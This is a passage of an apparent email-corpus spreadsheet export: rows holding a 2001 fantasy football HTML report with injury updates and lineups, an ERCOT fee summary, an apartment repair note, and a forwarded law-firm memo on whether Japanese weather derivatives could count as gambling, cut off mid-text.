&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1321&amp;"&gt;&lt;B&gt;Wesley Walls&lt;/B&gt;&lt;/A&gt;, TE CAR - Pink Panthers &lt;FONT SIZE=1&gt;_x000D_
Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Walls missed practice on Thursday with a knee injury. He may be a gametime decision this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=188183&amp;"&gt;&lt;B&gt;Maurice Smith&lt;/B&gt;&lt;/A&gt;, RB ATL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;A banged-up Smith Toe/knee)  will continue to start for the Falcons. But Dan Reeves has indicated Rodney Thomas will continue to get some work at halfback. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1077&amp;"&gt;&lt;B&gt;Bob Christian&lt;/B&gt;&lt;/A&gt;, RB ATL - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Christian is day to day with a calf injury. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1440&amp;"&gt;&lt;B&gt;Stephen Davis&lt;/B&gt;&lt;/A&gt;, RB WAS - TexOK &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Davis (knee) has returned to practice. He is expected to start this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1871&amp;"&gt;&lt;B&gt;Todd Bouman&lt;/B&gt;&lt;/A&gt;, QB MIN - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bouman took a few snaps Thursday but didn't appear to meet coach Dennis Green's "full strength" criteria for starting against Green Bay.   Spergon Wynn is likely to start Sunday, though coaches didn't discuss the issue after Thursday's practice. Bouman didn't participate in the team's morning walk-through, when players work on plays without fully suiting up. And during the portion of the regular!_x000D_
 p!_x000D_
ractice that reporters were allowed to watch, Wynn took more snaps than Bouman. A trainer said Wynn continued to take more snaps later in the closed portion of practice.  &lt;/FONT&gt;_x000D_
&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1152&amp;"&gt;&lt;B&gt;Jerome Bettis&lt;/B&gt;&lt;/A&gt;, RB PIT - The Rocks &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Bettis, sidelined by a groin injury, returned to the practice field Thursday for the first time in a month. "Still questionable," coach Bill Cowher said. "He did more today. We'll see how he feels (Friday) and go from there. We'll take it day to day." &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1393&amp;"&gt;&lt;B&gt;Doug Brien&lt;/B&gt;&lt;/A&gt;, K TB - Free Agent &lt;FONT SIZE=1&gt;Updated 12/28/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;_x000D_
Brien signed a one-year contract Thursday night with the Tampa Bay Buccaneers, who will use him against Baltimore if Martin Gramatica can't kick this week. Gramatica strained his right hamstring during a 48-21 victory over the Saints last week. Coach Tony Dungy hasn't ruled him out for Saturday night's game against Baltimore, however the club wanted to have a backup plan in case the Pro Bowl kicker isn't ready. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-player-updates&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;start=30&amp;"&gt;More Updates&lt;/A&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Schedule,&amp;nbsp;Breakdown&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
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BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH=100%&gt;&lt;TR&gt;&lt;TD VALIGN=top WIDTH=48%&gt;&lt;FONT SIZE=3&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;Grigsby&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Points&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=12531&amp;week=16&amp;"&gt;Manning, Peyton&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1109&amp;week=16&amp;"&gt;Faulk, Marshall&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1149&amp;week=16&amp;"&gt;Garner, Charlie&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1211&amp;week=16&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=12306&amp;week=16&amp;"&gt;Crowell, Germane&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1286&amp;week=16&amp;"&gt;Galloway, Joey&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1385&amp;week=16&amp;"&gt;Conway, Brett&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;K&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=13&amp;week=16&amp;"&gt;Jaguars&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;B&gt;TOTAL&lt;/B&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&lt;B&gt;0.0&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=24&amp;week=16&amp;"&gt;Chargers&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=12795&amp;week=16&amp;"&gt;Ward, Hines&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1019&amp;week=16&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1782&amp;week=16&amp;"&gt;Barber, Tiki&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=133393&amp;week=16&amp;"&gt;Price, Peerless&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;[Morris, Bam]&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;/TABLE&gt;&lt;BR&gt;&lt;/TD&gt;&lt;TD WIDTH=4%&gt;&lt;IMG HSPACE=5 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;TD VALIGN=top WIDTH=48%&gt;&lt;FONT SIZE=3&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;at FJS&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Points&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1032&amp;week=16&amp;"&gt;Brunell, Mark&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1143&amp;week=16&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1132&amp;week=16&amp;"&gt;Martin, Curtis&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1260&amp;week=16&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1851&amp;week=16&amp;"&gt;Connell, Albert&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1183&amp;week=16&amp;"&gt;Moore, Rob&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=12783&amp;week=16&amp;"&gt;Vanderjagt, Mike&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;K&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=16&amp;week=16&amp;"&gt;Vikings&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;B&gt;TOTAL&lt;/B&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&lt;B&gt;0.0&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1121&amp;week=16&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1054&amp;week=16&amp;"&gt;Stewart, Kordell&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1774&amp;week=16&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1269&amp;week=16&amp;"&gt;Jett, James&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1235&amp;week=16&amp;"&gt;McCardell, Keenan&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ee&amp;owner=96876.9&amp;random=2300&amp;key=1471&amp;week=16&amp;"&gt;Richardson, Tony&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;/TABLE&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;IMG WIDTH=1px HEIGHT=1px SRC="http://football292.fantasy.sportsline.com/mp/open_gif?splnid=6c9f5755f428de1a&amp;league=ee&amp;owner=96876.9&amp;email=7e42a28a21d85b828ac4d9d45fbd98b6927b929c31cf0865&amp;sport=football&amp;vend=CBS%20SportsLine.com&amp;product=mgmt&amp;time=20011230&amp;type=ereport&amp;random=2300"&gt;&lt;HR&gt;&lt;CENTER&gt;Copyright 2001 Commissioner.COM Inc and SportsLine.com Inc.&lt;BR&gt;Your site can be reached from &lt;A HREF=http://fantasy.sportsline.com&gt;http://fantasy.sportsline.com&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;FB10SP&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 02:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'clint.dean@enron.com', 'andrea.dahlke@enron.com'})</t>
  </si>
  <si>
    <t>ERCOT 5/3</t>
  </si>
  <si>
    <t>Unplanned Losses - ($2130.93)_x000D_
Static Sch Fees - $414.00_x000D_
_x000D_
Total - ($1716.93)_x000D_
_x000D_
_x000D_
ERCOT Sch Fees - $418.00</t>
  </si>
  <si>
    <t>Thu, 14 Sep 2000 03:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'a2street@hewitt.com'})</t>
  </si>
  <si>
    <t>apt. update</t>
  </si>
  <si>
    <t>Ashley, the oven/stove problem should be fixed before the weekend.  If you _x000D_
have any further problems with it please let me know; I realize it's pretty _x000D_
old.  I never noticed the control for the oven doesn't even have temperatures _x000D_
marked on it...the repairman is definitely taking care of that too!  The _x000D_
handy dudes are coming over to give me an estimate on the kitchen and _x000D_
bathroom floors and I'm going to also ask them to replace the wood around the _x000D_
A/C in the second bedroom.  If there's anything else you've noticed that _x000D_
needs fixing let me know.</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 10:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ENRON Request for Further Advice</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
----- Forwarded by Alan Aronowitz/HOU/ECT on 07/10/2000 05:33 PM -----_x000D_
_x000D_
	John Viverito@ENRON_x000D_
	06/13/2000 10:23 AM_x000D_
		 _x000D_
		 To: David Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 cc: Alan Aronowitz/HOU/ECT@ECT_x000D_
		 Subject: RE: ENRON Request for Further Advice_x000D_
_x000D_
David-_x000D_
_x000D_
I am also faxing you a copy of B&amp;M's initial advice regarding the gambling _x000D_
issue, which I believe to contain a more concise explanation of the relevant _x000D_
issues and a better explanation as to what may be done to minimize our _x000D_
risks.  _x000D_
_x000D_
Please give me a ring after you have had the opportunity to review B&amp;M's _x000D_
advice._x000D_
_x000D_
Cheers,_x000D_
_x000D_
John_x000D_
----- Forwarded by John Viverito/Corp/Enron on 06/13/2000 09:56 AM -----_x000D_
_x000D_
	Anne.Hung@BAKERNET.com_x000D_
	06/13/2000 06:26 AM_x000D_
		 _x000D_
		 To: John.Viverito@enron.com_x000D_
		 cc: David.Minns@enron.com, Alan.Aronowitz@enron.com, _x000D_
Paul.TYO.Davis@BakerNet.com, Jeremy.Pitts@BAKERNET.com, _x000D_
Shinji.Toyohara@BAKERNET.com, Toshio.Sasaki@BAKERNET.com_x000D_
		 Subject: RE: ENRON Request for Further Advice_x000D_
_x000D_
_x000D_
Dear John,_x000D_
_x000D_
In relation to your specific questions, our answers are as follows:_x000D_
_x000D_
1. We confirm that there are no regulatory approvals required to trade _x000D_
Japanese_x000D_
weather derivatives whether or not the Enron counterparty is or is not_x000D_
incorporated or resident of Japan._x000D_
_x000D_
2. No, except that trading weather derivatives online would make it more_x000D_
difficult for Enron to ascertain the suitability of the counterparty (see_x000D_
gambling issue below) as online transactions would probably allow very limited_x000D_
due diligence opportunities. _x000D_
_x000D_
3. Enron will need to pay close attention to ensure that weather derivative_x000D_
products are not considered "gambling" activities.  As discussed in our_x000D_
memorandum of January 14, 2000, all derivative transactions may potentially_x000D_
constitute gambling transactions.  If  the transaction does constitute _x000D_
gambling,_x000D_
Enron may be exposed to criminal sanctions (if the activity is conducted in_x000D_
Japan)  and  the contract may be declared void by a court and thus be_x000D_
unenforceable._x000D_
 _x000D_
Under Article 35 of the Criminal Code, there is a defense to any possible_x000D_
criminal action if the transaction is entered into for legitimate purposes.  _x000D_
To_x000D_
determine whether the parties have a legitimate business purpose, a court _x000D_
would_x000D_
need to look at all relevant facts and circumstances including the nature of _x000D_
the_x000D_
derivative contract entered into and the underlying business of the_x000D_
counterparties.  _x000D_
 _x000D_
There are four possible combinations of parties to these contracts:_x000D_
        Case 1: Enron Non Japan/Japanese Resident_x000D_
        Case 2: Enron Japan/Japanese Resident_x000D_
        Case 3: Enron Japan/Non Japanese Resident_x000D_
        Case 4: Enron Non Japan/Non Japanese Resident_x000D_
_x000D_
In both cases 1 and 2, Enron needs to ensure that the Japanese counterparty _x000D_
has_x000D_
a legitimate business purpose to confirm that the transaction does not fall_x000D_
within Article 185 and 186 of the Criminal Code which would render the _x000D_
contract_x000D_
unenforceable._x000D_
_x000D_
In cases 2 and 3, the need to comply with the law is also to ensure that Enron_x000D_
Japan (and its officers) do not unwittingly commit criminal offences under the_x000D_
Criminal Code. _x000D_
_x000D_
In cases 3 and 4, Enron would need to ensure that the counterparty is _x000D_
permitted_x000D_
to enter into the transaction with Enron or Enron Japan without breaching the_x000D_
